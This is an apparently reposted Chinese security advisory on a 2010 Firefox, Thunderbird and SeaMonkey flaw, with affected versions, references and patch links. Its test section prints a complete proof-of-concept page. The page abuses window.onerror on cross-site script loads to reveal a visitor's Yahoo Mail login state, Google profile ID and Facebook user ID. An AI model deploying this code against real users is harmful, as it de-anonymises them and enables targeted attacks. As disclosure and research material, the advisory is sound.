受影响系统:
Mozilla Firefox 3.6.x
Mozilla Firefox 3.5.x
Mozilla Thunderbird 3.1.x
Mozilla Thunderbird 3.0.x
Mozilla SeaMonkey < 2.0.6
不受影响系统:
Mozilla Firefox 3.6.7
Mozilla Firefox 3.5.11
Mozilla Thunderbird 3.1.1
Mozilla Thunderbird 3.0.6
Mozilla SeaMonkey 2.0.6
描述:
Firefox是一款流行的开源WEB浏览器。
Firefox中的脚本出错处理方式会显示错误的来源,其中可能包含有敏感信息。假设 http://SampleSite.com/admin.asp 页面使用了以下逻辑:
1- 如果用户没有登录,重新定向到登录页面。
2- 如果用户不是管理员,重新定向到拒绝访问页面。
3- 如果用户为管理员,显示管理员菜单。
攻击者可以使用跨站URL劫持技术确认用户在SampleSite.com所处的状态,并继续执行有针对性的攻击。
<*来源:Soroush Dalili (Irsdl@yahoo.com)
链接:http://secunia.com/advisories/39925/
http://www.mozilla.org/security/announce/2010/mfsa2010-47.html
https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=568564
http://s4.12dl.com/browse.php?u=36cbb9bb0ced60f3700Oi8vMG1lLm1lL2RlbW8vWFNVSC9YU1VIX0ZGXzEucGRm&b=15
https://www.redhat.com/support/errata/RHSA-2010-0544.html
https://www.redhat.com/support/errata/RHSA-2010-0545.html
https://www.redhat.com/support/errata/RHSA-2010-0547.html
https://www.redhat.com/support/errata/RHSA-2010-0546.html
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
XSUH (Cross Site URL Hijacking) Demo by Soroush Dalili – IRSDL at Yahoo d0t com
<br/>
Tested Platform: This technique has been tested on Mozilla Firefox 3.6.3, 3.5.9, 3.6.4build4.
<br/>
Blog: <a href="http://soroush.secproject.com/blog/">Click Here</a>
<br/>
Mirror Blog: <a href="http://irsdl1.wordpress.com">Click Here</a>
<br/><hr/>
1. Which Version of Yahoo Mail Are You Currently Using: <b><font color="#00FF11"><span id="yahooresult"></span></font></b>
<br/>
2. What Is Your Profile ID in Google.com: <b><font color="#7777FF"><span id="googleresult"></span></font></b>
<br/>
3. What Is Your Facebook User ID If You Play Farmville: <b><font color="#0077FF"><span id="fbresult"></span></font></b>
<br/>
<script>
window.onerror=fnErrorTrap;
function fnErrorTrap(sMsg,sUrl,sLine){
var msg = ”;
sUrl = unescape(sUrl);
if(sUrl.indexOf(‘yahoo’)>0) // Yahoo
{
if(sUrl.indexOf(‘/dc/’)>0)
msg = ‘You Are Using New Version of Yahoo Mail!’;
else if(sUrl.indexOf(‘/mc/’)>0)
msg = ‘You Are Using Old Version of Yahoo Mail!’;
else
msg = ‘You Are Not Logged-in in Yahoo Mail!’;
document.getElementById(‘yahooresult’).innerHTML = msg;
}
else if(sUrl.indexOf(‘google’)>0) //Google
{
if(sUrl.indexOf(‘/ServiceLogin’)>0)
msg = ‘You Are Not Logged-in in Google.com!’;
else if(sUrl.indexOf(‘/editprofile’)>0)
msg = ‘You Are Logged-in in Google.com But You Do Not Have Any Profile!’;
else if(sUrl.indexOf(‘/profiles/’)>0)
msg = ‘Your Profile ID In Google.com Is: ‘+sUrl.substring(sUrl.lastIndexOf(‘/’)+1);
else
msg = ‘You Are Logged-in in Google But I Cannot Find Your Profile ID!!!’;
document.getElementById(‘googleresult’).innerHTML = msg;
}else // Facebook
{
if(sUrl.indexOf(‘login.php’)>0)
msg = ‘You Are Not Logged-in in Facebook!’;
else if(sUrl.indexOf(‘tos.php’)>0)
msg = ‘WoW! You Do Not Play Farmville?!!’;
else if(sUrl.indexOf(‘xd_receiver.htm’)>0)
{
var temp = sUrl.substring(sUrl.indexOf(‘uid":’));
msg = ‘Your Facebook User ID Is: ‘+temp.substring(5,temp.indexOf(‘,’));
}
else
msg = ‘I Cannot Get The Point!’;
document.getElementById(‘fbresult’).innerHTML = msg;
}
return false;
}
if(!(/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent)))
alert(‘Please use Mozilla Firefox’);
else
{
document.write(‘<script src="http://mail.yahoo.com/"><\/script>’);
document.write(‘<script src="http://www.google.com/profiles/me"><\/script>’);
document.write(‘<script src="http://www.facebook.com/login.php?return_session=1&nochrome=1&fbconnect=1&extern=2&display=popup&api_key=80c6ec6628efd9a465dd223190a65bbc&v=1.0&next=http://www.farmville.com/xd_receiver.htm"><\/script>’);
}
</script>
建议:
厂商补丁:
Mozilla
——-
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
RedHat
——
RedHat已经为此发布了一个安全公告(RHSA-2010:0546-01)以及相应补丁:
RHSA-2010:0546-01:Critical: seamonkey security update
链接:https://www.redhat.com/support/errata/RHSA-2010-0546.html
0 条评论。